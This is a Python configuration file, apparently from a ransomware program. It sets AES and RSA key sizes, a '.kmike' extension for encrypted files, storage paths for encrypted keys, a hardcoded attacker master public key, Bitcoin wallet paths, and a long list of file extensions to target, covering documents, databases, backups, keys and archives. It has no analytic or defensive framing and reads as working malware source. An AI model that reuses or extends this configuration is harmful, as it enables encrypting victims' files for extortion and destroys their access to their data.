AES_INITIALIZATION_VECTOR_SIZE_IN_BYTES = 16
AES_SECRET_KEY_SIZE_IN_BYTES = 32
AES_BLOCK_SIZE_IN_BITS = 128

RSA_KEY_SIZE_IN_BITS = 2048
RSA_PUBLIC_EXPONENT = 65537

ENCRYPTED_FILE_EXTENSION = ".kmike"
ENCRYPTED_AES_KEY_FILE_LOCATION = "aes_keys.txt.kmike"
UNENCRYPTED_AES_KEY_FILE_LOCATION = "keys.txt"

ENCRYPTED_LOCAL_RSA_PRIVATE_KEY_FILE_LOCATION = "encrypted_local_master_key.kmike"
UNENCRYPTED_LOCAL_RSA_PRIVATE_KEY_FILE_LOCATION = "local_master_key.txt"
LOCAL_RSA_PUBLIC_KEY_FILE_LOCATION = "local_public_key"

CLIENT_ID_LOCATION = "client_id"
ENCRYPTED_BITCOIN_KEY_LOCATION = "bitcoin_private_key.txt.kmike"
BITCOIN_WALLET_ID_PATH = "bitcoin_wallet_id.kmike"

MASTER_PUBLIC_KEY = b'''-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0eICVbBvs4xltzF1qCkd
NN2sT4vGpySn2azzQtE5zDyqe0vrF5RsL0P1cK9GokcNBp+L8oAgCnN/6bb10Gc8
233dI0NubaZBWRmR8lHuRu2t3DLxngDPwfdg5UWnEMLbDjx3/8hfw3tiIRua/W3r
+3iXomPQajY7EiI0KBv4Z2F+sIIdHbKFB0Mj8rwgZCholzW6KV0h46ILpDfy0QvX
VPe5+hLzAuhX3Xl2C0dJbSExEYaXlItMHnJUPD+fBHg0oZGwZs1Ql5LB9QZKulLS
PGK7eo4VLnKvWKhVRU8EYA89wu68797phjctDucqP5g5htNaikFqTA60LbzCrMe7
uQIDAQAB
-----END PUBLIC KEY-----'''

REQUIRED_FILE_FORMAT = {
    ".3DM",
    ".3DS",
    ".3G2",
    ".3GP",
    ".602",
    ".7Z",
    ".ACCDB",
    ".AES",
    ".AI",
    ".ARC",
    ".ASC",
    ".ASF",
    ".ASM",
    ".ASP",
    ".AVI",
    ".BACKUP",
    ".BAK",
    ".BAT",
    ".BMP",
    ".BRD",
    ".BZ2",
    ".C",
    ".CGM",
    ".CLASS",
    ".CMD",
    ".CPP",
    ".CRT",
    ".CS",
    ".CSR",
    ".CSV",
    ".DBF",
    ".DCH",
    ".DER",
    ".DIF",
    ".DIP",
    ".DJVU",
    ".DOC",
    ".DOCB",
    ".DOCM",
    ".DOCX",
    ".DOT",
    ".DOTM",
    ".DOTX",
    ".DWG",
    ".EDB",
    ".EML",
    ".FLA",
    ".FLV",
    ".FRM",
    ".GIF",
    ".GPG",
    ".GZ",
    ".H",
    ".HWP",
    ".IBD",
    ".ISO",
    ".JAR",
    ".JAVA",
    ".JPEG",
    ".JPG",
    ".JS",
    ".JSP",
    ".KEY",
    ".LAY",
    ".LAY6",
    ".LDF",
    ".M3U",
    ".M4U",
    ".MAX",
    ".MDB",
    ".MDF",
    ".MID",
    ".MKV",
    ".MML",
    ".MOV",
    ".MP3",
    ".MP4",
    ".MPEG",
    ".MPG",
    ".MSG",
    ".MYD",
    ".MYI",
    ".NEF",
    ".ODB",
    ".ODG",
    ".ODP",
    ".ODS",
    ".ODT",
    ".ONETOC2",
    ".OST",
    ".OTG",
    ".OTP",
    ".OTS",
    ".OTT",
    ".P12",
    ".PAQ",
    ".PAS",
    ".PDF",
    ".PEM",
    ".PFX",
    ".PHP",
    ".PL",
    ".PNG",
    ".POT",
    ".POTM",
    ".POTX",
    ".PPAM",
    ".PPS",
    ".PPSM",
    ".PPSX",
    ".PPT",
    ".PPTM",
    ".PPTX",
    ".PS1",
    ".PSD",
    ".PST",
    ".RAR",
    ".RAW",
    ".RB",
    ".RTF",
    ".SCH",
    ".SH",
    ".SLDM",
    ".SLDX",
    ".SLK",
    ".SLN",
    ".SNT",
    ".SQL",
    ".SQLITE3",
    ".SQLITEDB",
    ".STC",
    ".STD",
    ".STI",
    ".STW",
    ".SUO",
    ".SVG",
    ".SWF",
    ".SXC",
    ".SXD",
    ".SXI",
    ".SXM",
    ".SXW",
    ".TAR",
    ".TBK",
    ".TGZ",
    ".TIF",
    ".TIFF",
    ".TXT",
    ".UOP",
    ".UOT",
    ".VB",
    ".VBS",
    ".VCD",
    ".VDI",
    ".VMDK",
    ".VMX",
    ".VOB",
    ".VSD",
    ".VSDX",
    ".WAV",
    ".WB2",
    ".WK1",
    ".WKS",
    ".WMA",
    ".WMV",
    ".XLC",
    ".XLM",
    ".XLS",
    ".XLSB",
    ".XLSM",
    ".XLSX",
    ".XLT",
    ".XLTM",
    ".XLTX",
    ".XLW",
    ".ZIP",
}

